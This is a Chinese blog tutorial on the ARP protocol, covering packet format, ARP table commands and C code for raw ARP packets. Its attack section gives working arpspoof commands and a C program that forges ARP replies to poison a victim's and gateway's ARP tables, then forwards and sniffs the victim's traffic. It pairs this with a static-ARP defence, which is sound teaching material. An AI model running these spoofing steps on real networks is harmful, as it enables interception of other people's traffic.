3. ARP 协议分析与实践

最新推荐文章于 2021-05-12 23:31:02 发布
最新推荐文章于 2021-05-12 23:31:02 发布
阅读量466 收藏 1
点赞数
分类专栏: 网络协议 文章标签: arp 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhishenluo/article/details/103430431
版权

3. ARP 协议分析与实践

1. 概述

  • ARP(Address Resolution Protocol, 地址解析协议) : 负责将网络地址解析成对应的 MAC 地址。

  • 官方文档 : RFC826 RFC6747

1.1 ARP 报文格式

  • ARP 包分为请求包和应答包, 通过 OP 字段来区别
    在这里插入图片描述
# 发送 ARP 请求包
arping -I eth0 192.168.2.200

# ARP 请求抓包
sudo tcpdump -nt -XX arp 'dst 192.168.2.200 or src 192.168.2.200'
ARP, Request who-has 192.168.2.200 (ff:ff:ff:ff:ff:ff) tell 192.168.2.100, length 28
	0x0000:  ffff ffff ffff 000c 0c0c 0c0c 0806 0001  ................
	0x0010:  0800 0604 0001 000c 0c0c 0c0c c0a8 0264  ...............d
	0x0020:  ffff ffff ffff c0a8 02c8                 ..........
ARP, Reply 192.168.2.200 is-at 00:0d:0d:0d:0d:0d, length 46
	0x0000:  000c 0c0c 0c0c 000d 0d0d 0d0d 0806 0001  ................
	0x0010:  0800 0604 0002 000d 0d0d 0d0d c0a8 02c8  ................
	0x0020:  000c 0c0c 0c0c c0a8 0264 0000 0000 0000  .........d......
	0x0030:  0000 0000 0000 0000 0000 0000            ............

1.2 ARP 表

  • 为了避免每次网络请求都要发送 ARP 请求, 将网络地址转换为 MAC 地址, 在每台主机中都有 ARP 缓存表,缓存表中记录了IP地址与 MAC 地址的对应关系
# 查看
arp -vn
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.200            ether   00:0d:0d:0d:0d:0d   C                     eth0
192.168.2.3              ether   00:0b:0b:0b:0b:0b   C                     eth0

# 添加(-s)
sudo arp -i eth0 -s 192.168.2.200 ff:ee:ee:ee:ee:ee

# 删除(-d)
sudo arp -i eth0 -d 192.168.2.200

# 当 eth0 收到 IP 地址为 10.0.0.2 的请求时, 用 eth1 的 MAC 地址应答
sudo arp -i eth0 -Ds 10.0.0.2 eth1 pub

2. ARP 编程

2.1 arp.h

shell> cat arp.h
#ifndef __arp_h__
#define __arp_h__

#define ARP_OP_REQUEST  0x0001
#define ARP_OP_REPLY    0x0002

#define ARP_HW_TYPE_ETH 0x0001  /* 0x0001 表示以太网 */

struct arp_packet {
	unsigned short hwtype;     /* Hardware Type */
	unsigned short prototype;  /* Protocol Type */
	unsigned char  hal;        /* Hardware Address Length */ 
	unsigned char  pal;        /* Protocol Address Length (uses new value 12) */
	unsigned short opcode;     /* Operation Code (uses experimental value OP_EXP1=24) */
	unsigned char  smac[6];	   /* Sender Hardware Address */
	unsigned int   sip;        /* Sender IP Address */
	unsigned char  tmac[6];	   /* Target Hardware Address */
	unsigned int   tip;        /* Target IP Address */
}__attribute__((packed));


struct arp_packet* arp_alloc_packet(unsigned short opcode, const char* smac, 
		const char* sip, const char* tmac, const char* tip);

void arp_free_packet(struct arp_packet** packet);

#endif /* __arp_h__ */

2.2 arp.c

shell> cat arp.c
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>       // for htons
#include <netinet/ether.h>   // for ether_aton
#include "eth.h"
#include "arp.h"


struct arp_packet* arp_alloc_packet(unsigned short opcode, const char* smac, 
		const char* sip, const char* tmac, const char* tip)
{
	struct in_addr in;
	struct ether_addr *addr;
	struct arp_packet *packet;

	packet = (struct arp_packet *)calloc(1, sizeof(struct arp_packet));
	packet->hwtype    = htons(ARP_HW_TYPE_ETH);
	packet->prototype = htons(ETH_PROTO_IP); 
	packet->hal       = 6;                // 硬件地址长度 
	packet->pal       = 4;                // 上层协议长度
	packet->opcode    = htons(opcode);

	addr = ether_aton(smac);	
	memcpy(packet->smac, addr->ether_addr_octet, sizeof(addr->ether_addr_octet));

	inet_aton(sip, &in);
	packet->sip = in.s_addr;

	addr = ether_aton(tmac);	
	memcpy(packet->tmac, addr->ether_addr_octet, sizeof(addr->ether_addr_octet));

	inet_aton(tip, &in);
	packet->tip = in.s_addr;

	return packet;
}

void arp_free_packet(struct arp_packet** packet)
{
	if (NULL != packet && NULL != *packet) {
		free(*packet);
		*packet = NULL;
	}
}

2.3 main.c

shell> cat main.c
#include <stdio.h>
#include <string.h>
#include "eth.h"
#include "arp.h"

#define IFACE_NAME "eth0"
#define DEST_IP    "192.168.2.200"      /* 目标 IP */
#define SRC_IP     "192.168.2.100"      /* 本机 IP */
#define SRC_MAC    "00:0C:0C:0C:0C:0C"  /* 本机 MAC */
#define DEST_MAC   "FF:FF:FF:FF:FF:FF"  /* 广播地址 */

static void eth_send_test(const char *dest_mac, const char *src_mac, 
		unsigned short proto, const void *data, size_t size)
{
	int sockfd;
	struct eth_frame *frame;

	sockfd = eth_socket(IFACE_NAME);

	frame = eth_alloc_frame(dest_mac, src_mac, proto, data, size);
	eth_send(sockfd, frame, sizeof(struct eth_frame) + size, 0);

	eth_free_packet(&frame);	
	eth_close(sockfd);
}

static void arp_request_test()
{
	struct arp_packet *packet;
	packet = arp_alloc_packet(ARP_OP_REQUEST, SRC_MAC, SRC_IP, DEST_MAC, DEST_IP);

	eth_send_test(DEST_MAC, SRC_MAC, ETH_PROTO_ARP, packet, sizeof(struct arp_packet));
	arp_free_packet(&packet);
}

int main(int argc, char *argv[])
{
	arp_request_test();
	return 0;
}

192.168.2.100> make run

192.168.2.200> sudo tcpdump -nt -i eth0 -XX arp
ARP, Request who-has 192.168.2.200 (ff:ff:ff:ff:ff:ff) tell 192.168.2.100, length 46
	0x0000:  ffff ffff ffff 000c 0c0c 0c0c 0806 0001  ................
	0x0010:  0800 0604 0001 000c 0c0c 0c0c c0a8 0264  ...............d
	0x0020:  ffff ffff ffff c0a8 02c8 0000 0000 0000  ................
	0x0030:  0000 0000 0000 0000 0000 0000            ............
ARP, Reply 192.168.2.200 is-at 00:0d:0d:0d:0d:0d, length 28
	0x0000:  000c 0c0c 0c0c 000d 0d0d 0d0d 0806 0001  ................
	0x0010:  0800 0604 0002 000d 0d0d 0d0d c0a8 02c8  ................
	0x0020:  000c 0c0c 0c0c c0a8 0264                 .........d

3. ARP 攻防

3.1 ARP 欺骗

  • 攻击者通过发送伪造的 ARP 报文,恶意修改网关或网络内其他主机的ARP表项,造成设备网络报文转发异常
3.1.1 使用 arpspoof 实现 ARP 欺骗
# 1. 正常情况下, 目标机 ARP 表, 192.168.2.3 是网关
192.168.2.200> arp -vn
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.100            ether   00:0c:0c:0c:0c:0c   C                     eth0
192.168.2.3              ether   00:0b:0b:0b:0b:0b   C                     eth0

# 2. 修改目标机网关 MAC 地址为攻击者 MAC 地址, 让原本发给网关的数据, 发给攻击者
192.168.2.100> sudo arpspoof -i eth0 -t 192.168.2.200 192.168.2.3
0:c:c:c:c:c 0:d:d:d:d:d 0806 42: arp reply 192.168.2.3 is-at 0:c:c:c:c:c
0:c:c:c:c:c 0:d:d:d:d:d 0806 42: arp reply 192.168.2.3 is-at 0:c:c:c:c:c

# 3. 查看修改结果, 目标机上网关 MAC 地址被修改为攻击者 MAC 地址了
192.168.2.200> arp -vn
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.100            ether   00:0c:0c:0c:0c:0c   C                     eth0
192.168.2.3              ether   00:0c:0c:0c:0c:0c   C                     eth0

# 4. 正常情况下, 网关 ARP 表中 192.168.2.200 的 MAC 地址是 00:0d:0d:0d:0d:0d
192.168.2.3> arp -vn
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.100            ether   00:0c:0c:0c:0c:0c   C                     eth0
192.168.10.2             ether   00:50:56:f1:c4:46   C                     eth1
192.168.2.200            ether   00:0d:0d:0d:0d:0d   C                     eth0

# 5. 修改网关目标机 MAC 为攻击者 MAC 地址, 让原本响应给目标机的数据, 也发给攻击者
192.168.2.100> sudo arpspoof -i eth0 -t 192.168.2.3 192.168.2.200

# 6. 查看修改结果, 目标机 MAC 地址被修改为攻击者 MAC 地址了
192.168.2.3> arp -vn
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.100            ether   00:0c:0c:0c:0c:0c   C                     eth0
192.168.10.2             ether   00:50:56:f1:c4:46   C                     eth1
192.168.2.200            ether   00:0c:0c:0c:0c:0c   C                     eth0

# 7. 攻击机器开启路由转发功能
192.168.2.100> echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# 8. 监听目标机的流量
192.168.2.100> sudo tcpdump -i eth0 -nt -XX ip host 192.168.2.200

# 9. 目标机请求网络(将被监听)
192.168.2.200> ping baidu.com
3.1.2 ARP 欺骗防守
  • 利用 ARP 静态映射的表项, 加载后无法修改的特点, 防止 ARP 表被非法篡改
# 静态映射
echo '192.168.2.3 00:0b:0b:0b:0b:0b' | sudo tee -a /etc/ethers
sudo arp -f                                               # 默认读取 /etc/ethers 文件
echo '/usr/sbin/arp -f' | sudo tee -a /etc/rc.d/rc.local  # 开机自动映射 

# 查看映射结果(网关的 Flags Mask 中的 M 表示静态映射)
arp -vn
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.2.3              ether   00:0b:0b:0b:0b:0b   CM                    eth0
192.168.2.100            ether   00:0c:0c:0c:0c:0c   C                     eth0
3.1.3 ARP 欺骗编码实现
shell> cat main.c
#include <stdio.h>
#include <string.h>
#include "eth.h"
#include "arp.h"

#define IFACE_NAME "eth0"

static void eth_send_test(const char *dest_mac, const char *src_mac, 
		unsigned short proto, const void *data, size_t size)
{
	int sockfd;
	struct eth_frame *frame;

	sockfd = eth_socket(IFACE_NAME);

	frame = eth_alloc_frame(dest_mac, src_mac, proto, data, size);
	eth_send(sockfd, frame, sizeof(struct eth_frame) + size, 0);

	eth_free_packet(&frame);	
	eth_close(sockfd);
}

static void arp_reply_test(const char *src_mac, const char *src_ip, 
                           const char *dest_mac, const char *dest_ip) 
{
	struct arp_packet *packet;
	packet = arp_alloc_packet(ARP_OP_REPLY, src_mac, src_ip, dest_mac, dest_ip);

	eth_send_test(dest_mac, src_mac, ETH_PROTO_ARP, packet, sizeof(struct arp_packet));
	arp_free_packet(&packet);
}

static void arp_spoofing() 
{
	{
		// 欺骗目标机
		const char *src_ip   = "192.168.2.3"; 		
		const char *src_mac  = "00:0c:0c:0c:0c:0c";		
		const char *dest_ip  = "192.168.2.200"; 		
		const char *dest_mac = "00:0d:0d:0d:0d:0d"; 		
		arp_reply_test(src_mac, src_ip, dest_mac, dest_ip);	
	}

	{
		// 欺骗网关
		const char *src_ip   = "192.168.2.200"; 		
		const char *src_mac  = "00:0c:0c:0c:0c:0c"; 
		const char *dest_ip  = "192.168.2.3"; 		
		const char *dest_mac = "00:0b:0b:0b:0b:0b"; 		
		arp_reply_test(src_mac, src_ip, dest_mac, dest_ip);	
	}
}

int main(int argc, char *argv[])
{
	arp_spoofing();
	return 0;
}


# 开启路由转发功能
192.168.2.100> echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# 监听目标机的流量
192.168.2.100> sudo tcpdump -i eth0 -nt -XX ip host 192.168.2.200

# 重复执行, 防止 ARP 表恢复正常 
192.168.2.100> watch make run

# 目标机请求网络(将被监听)
192.168.2.200> ping baidu.com
百里奔跑
关注
专栏目录
arp原理(包括arp欺骗测试与防御)
Ghost_02的博客
05-16 2647
arp协议         地址解析协议,即ARP(Address Resolution Protocol),作用是通过IP地址换取mac地址。我们知道,在局域网内通信靠的是mac地址,而不是ip地址。有些人可能疑惑了,比如我要ping局域网内的网关,不就是ping 192.168.1.1 不就是用的IP地址吗??怎么说用的是mac地址,其实,在ping网关这个IP的时候,需要arp协议去得
《TCP/IP详解卷2:实现》笔记--ARP:地址解析协议
TODD911的专栏
10-30 4573
Net/3中ARP的实现是和路由表紧密关联的,
ARP报文
kklvsports的专栏
03-07 2719
以太网网络中,主机A(192.168.1.100)要发送报文给主机B(192.168.1.200)的话,A封装报文的时候,源IP和源MAC都是填自己的,  目的IP填主机B的IP,由于不知道主机B网卡的MAC地址,需要发送ARP报文,请求主机B网卡的MAC。A首次给B发报文的时候才需要发送ARP请求B的MAC(ARP学习),此时A的ARP缓存中记录了B的MAC,后续再向B发送报文的话,目的MAC直
ARP协议数据报
echo_bright_的博客
10-31 1848
1. ARP协议简析  ARP是属于数据链路层的协议,它的作用在于将网络层任意协议中携带的地址转换为物理(MAC)地址,工作原理为:   (1) 主机向自己所在的网络广播一个ARP请求数据报,该报含有目标机器的网络地址   (2) 所在网络上的其他机器都会收到这个请求,但只有目标机器才会回应ARP应答。应答数据报中包含了自身的物理地址  以基于以太网ARP请求/应答帧文为例:  以太网帧中的AR
arp 数据
IOS开发笔记
04-01 2662
Last login: Wed Apr  1 23:44:36 on ttys000 localhost:~ apple$ sudo tcpdump -i en0 host 192.168.0.1 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on en0, link-
arp.zip_ARP 协议_arp_arp协议_zxarps.rar download
09-14
在标签“arp_协议 arp arp协议 zxarps.rar_download”中,“arp”和“arp协议”反复提及,强调了该资源与ARP协议的紧密关系,而“zxarps.rar_download”可能是指该压缩包中的特定文件“zxarps.rar”是可以下载的,...
15. ARP协议性能分析与优化工具介绍
ARP协议简介 ## 1.1 ARP协议概述 Address Resolution Protocol(ARP)即地址解析协议,是在典型的局域网协议中作为网络层的一部分而存在的。它的主要功能是通过已知的IP地址来获取相应的MAC地址,以便在数据链路...
arp.rar_arp_arp c程序_arp协议C语言
最新发布
09-23
3. **代码分析**:对C语言实现的ARP协议代码进行注释和讲解,帮助读者理解每个函数和模块的作用,以及它们如何协同工作来实现协议功能。 4. **实验指导**:可能包含如何编译和运行代码的说明,以及如何通过命令行...
arp协议分析
12-08
arp协议分析
arp.tar.gz_arp_arptar_arp协议
09-19
在“arp.tar.gz_arp_arptar_arp协议”压缩包中,包含了与ARP协议相关的源代码、头文件、构建文件以及一个操作指南的图片,这些都是学习和理解ARP协议的宝贵资源。 1. ARP协议原理: ARP协议的基本功能是在发送数据...
使用tcpdump观察ARP通信过程和ARP报文详解
Be The Best!
01-14 1万+
tcpdump观察ARP通信过程
linux原始套接字(1)-arp请求与接收
zdy0_2004的专栏
01-28 1172
http://www.cnblogs.com/yuuyuu/p/5164685.html 一.概述                                                   以太网的arp数据包结构: arp结构op操作参数:1为请求,2为应答。 常用的数据结构如下: 1.物理地址结构位于netpacket/packet.h
ARP协议和路由器的工作原理
qq_41245301的博客
05-12 947
APR协议 1.地址解析协议 2.作用:将以知IP解析为MAC地址 3.原理:(1)发送ARP广播请求 ARP报文内容:我是IP:xxxx 我的MAC:XX XX XX XX XX XX        谁是IP:xxxx 我的MAC:XX XX XX XX XX XX  (2)接收ARP单播应答 4.APR攻击或欺骗的原理是: (1)发送伪造虚假的ARP报文(广播或单播),来实现攻击或欺骗 (2)如虚假报文的mac是伪造的不存在的,实现ARP攻击,结果是中断通讯 (3)如虚假报文的mac是攻击者的mac地
ARP请求
h3c_new的博客
04-13 348
ARP请求原理                        arp协议能实现网络层地址到物理地址的转换 arp报文解析                        物理地址类型 协议地址类型 物理地址长度 协议地址长度 操作 发送方物理地址 发送方协议地址 接收方物理地址 接受方协议地址 物理地址类型:2个字节,值为1表示MAC地址 协议
ARP协议分析
小白编程
03-14 2754
前言:ARP协议的作用: 1. 什么是ARP?    ARP (Address Resolution Protocol) 是个地址解析协议。最直白的说法是:在IP以太网中,当一个上层协议要发包时,有了该节点的IP地址,ARP就能提供该节点的MAC地址。   2为什么要有ARP? OSI 模式把网络工作分为七层,彼此不直接打交道,只通过接口(layre interface). IP地址在第三层, M...
经典ARP协议讲解,一定要看
weixin_30951389的博客
10-13 2686
以太网协议是目前最流行的通信协议之一。从底层到高层协议家族非常庞大。今天为您介绍一下经常用到却比一定知道的协议。 在链路层上,主机和路由器用他们的物理地址来标志,即48位的物理地址,也是是我们通常所说的网卡地址(MAC地址)。 在网络层上,主机和路由器用逻辑地址来标志,逻辑地址在本地是唯一的,但在全局上不一定。在TCP/IP协议族中称为IP地址,现在常用的版本是IPv4,长度是3...
ARP协议抓包分析
热门推荐
xiaoxiao的博客
05-22 3万+
一、什么是ARP ARP(地址解析协议)是根据IP地址获取物理地址的一个TCP/IP协议。由于OSI将网络分为七层,IP地址在OSI模型的第三层,MAC地址在第二层,彼此不直接通信。在通过以太网发送IP数据包时,需要知道先封装第三层和第二层的报头。但由于发送数据包时只知道目标IP地址,不知道其MAC地址,而又不能跨越第二、三层,所以需要地址解析协议。 二、ARP工作流程 ARP请求与响应过程 (1...
ARP协议格式和实例分析
宁悦的博客
06-19 3万+
ARP协议是一个网络层协议,它的出现是为了完成网络层的ip和数据链路层的MAC地址之间的对应关系。 一、ARP协议的报文格式 arp的报文格式如下: 1.硬件地址类型:该字段表示物理网络类型,即标识数据链路层使用的是那一种协议,其中0x0001为以太网。 2.协议地址类型:该字段表示网络地址类型,即标识网络层使用的是那一种协议,其中0x0800表示为ip。 3.硬
Wireshark实践:解析以太网帧与ARP协议
实验二使用Wireshark分析以太网帧与ARP协议,其核心目标是深入理解MAC地址在局域网中的作用以及ARP协议如何进行IP到MAC地址的转换。实验环境包括连接至互联网的计算机网络系统,操作系统为Windows,并利用Wireshark...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值